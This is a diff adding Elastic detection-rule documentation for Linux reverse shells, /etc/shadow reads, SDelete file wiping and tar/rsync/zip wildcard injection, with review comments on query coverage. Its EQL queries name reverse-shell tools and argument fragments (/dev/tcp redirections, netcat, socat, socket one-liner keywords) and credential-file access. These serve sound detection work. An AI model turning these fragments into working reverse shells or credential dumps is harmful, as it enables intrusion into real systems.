@@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process]] +=== Potential Reverse Shell via Background Process + +Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("setsid", "nohup") and process.args : "*/dev/tcp/*0>&1*" and +process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ 
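Review bot: `process.args : "*/dev/tcp/*0>&1*"` in the Potential Reverse Shell via Background Process query keys on the literal `0>&1` redirection immediately after the `/dev/tcp/` path, which is a narrow subset of what the sibling Potential Reverse Shell Activity via Terminal rule matches with `"*/dev/tcp/*", "*/dev/udp/*"`; the description should state that this rule is deliberately scoped to that one spelling and to TCP only, or the pattern should be widened to the same set so the two rules do not silently disagree on coverage. Also, `*References*: None` and no investigation guide on a rule that already sits at version 2: linking the same reverse-shell reference the neighbouring rules cite would give an analyst triaging a `setsid`/`nohup` hit somewhere to start.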
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc new file mode 100644 index 0000000000..047b3b00b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc 
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-java]] +=== Potential Reverse Shell via Java + +This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and + process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" + ] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and + process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + process.parent.args : "-jar" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: 
T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc new file mode 100644 index 0000000000..6eb92b7196 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc 
@@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary]] +=== Potential Reverse Shell via Suspicious Binary + +This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*", + "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local" + ) and + process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and not + process.name : ("curl", "wget", "ping", "apt", "dpkg", "yum", "rpm", "dnf", "dockerd") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in 
("connection_attempted", "connection_accepted") and + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/crontab", "/etc/cron.*", "/etc/update-motd.d/*", "/usr/lib/update-notifier/*", + "/boot/*", "/srv/*", "/run/*", "/root/*", "/etc/rc.local" + ) and destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] +[ process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc new file mode 100644 index 0000000000..73d6629a5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc 
@@ -0,0 +1,97 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process]] +=== Potential Reverse Shell via Suspicious Child Process + +This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and ( + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and 
process.args : "-r" and process.args : "*fsockopen*" and process.args : "*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) + ) and process.parent.name : ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "php*", "perl", "ruby", "lua*", + "openssl", "nc", "netcat", "ncat", "telnet", "awk")] + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc new file mode 100644 index 0000000000..e25d9252a3 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc 
@@ -0,0 +1,86 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-udp]] +=== Potential Reverse Shell via UDP + +This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sample by host.id, process.pid, process.parent.pid +[process where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "execve" and process.name : ("bash", "dash", "sh", "tcsh", + "csh", "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", + "openssl", "awk", "telnet", "lua*", "socat")] +[process where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "socket" and process.name : ("bash", "dash", "sh", "tcsh", "csh", + "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", "openssl", + "awk", "telnet", "lua*", "socat") and 
auditd.data.a0 == "2" and auditd.data.a1 : ("2", "802")] +[network where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "connect" and process.name : ("bash", "dash", "sh", "tcsh", "csh", + "zsh", "ksh", "fish", "perl", "python*", "nc", "ncat", "netcat", "php*", "ruby", "openssl", + "awk", "telnet", "lua*", "socat") and network.direction == "egress" and destination.ip != null and + destination.ip != "127.0.0.1" and destination.ip != "127.0.0.53" and destination.ip != "::1"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc new file mode 100644 index 0000000000..c37a65a4ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc 
@@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell]] +=== Potential Reverse Shell + +This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1s + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and not + process.args : "*imunify360-agent*"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: 
+** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc new file mode 100644 index 0000000000..8c1d79cee3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc 
@@ -0,0 +1,116 @@ +[[prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility]] +=== Potential Secure File Deletion via SDelete Utility + +Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Impact +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Secure File Deletion via SDelete Utility + +SDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts. + +This rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity. + +### False positive analysis + +- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If important data was encrypted, deleted, or modified, activate your data recovery plan. + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "change" and file.name : "*AAA.AAA" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc new file mode 100644 index 0000000000..e9d215f030 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc 
@@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities]] +=== Potential Shadow File Read via Command Line Utilities + +Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.category : "process" and event.action : ("exec" or "exec_event") and +(process.args : "/etc/shadow" or (process.working_directory: "/etc" and process.args: "shadow")) and not +(process.executable : ("/bin/chown" or "/usr/bin/chown") and process.args : "root:shadow") and not +(process.executable : ("/bin/chmod" or "/usr/bin/chmod") and process.args : "640") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** 
Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc new file mode 100644 index 0000000000..fedd8da0f4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc 
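Review bot: the query in the `Rule query` block is both broader and narrower than the description claims. `process.args : "/etc/shadow"` matches any executable, not just "standard system utilities", so the description should say so; at the same time an exact-token match never sees `/etc/shadow-` (the backup file), `/etc//shadow` or a relative path such as `../etc/shadow`, and the `process.working_directory: "/etc"` clause only covers a bare `shadow` token. Consider `process.args : ("/etc/shadow", "/etc/shadow-", "*/etc/shadow*")`. Note also that the two exclusions, `process.args : "root:shadow"` and `process.args : "640"`, are satisfied by those tokens appearing anywhere in the argument list, not only as the argument that precedes `/etc/shadow`, so they suppress more than the intended `chown root:shadow /etc/shadow` and `chmod 640 /etc/shadow` maintenance commands.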
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected]] +=== Potential Shell via Wildcard Injection Detected + +This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/papers/33930 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "tar" and process.args : "--checkpoint=*" and process.args : "--checkpoint-action=*") or + (process.name == "rsync" and process.args : "-e*") or + (process.name == "zip" and process.args == "--unzip-command") )] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.parent.name : ("tar", "rsync", "zip") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] by process.parent.entity_id + 
+---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc new file mode 100644 index 0000000000..66d84e60cc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc 
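Review bot: the `zip` branch of the first sequence step uses an exact match, `process.args == "--unzip-command"`, while the `tar` branch uses wildcards (`--checkpoint=*`, `--checkpoint-action=*`); the form the referenced exploit-db paper uses is `--unzip-command="sh -c ..."`, where option and value arrive as a single argv token, so the exact match never fires on the documented attack. Mirror the tar pattern with `process.args : "--unzip-command*"`, which still catches the separate-token spelling. It would also help readers to state in the description that the second step (a shell whose parent is `tar`, `rsync` or `zip`) is what separates an injected `--checkpoint-action=exec=...` from ordinary use of those flags.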
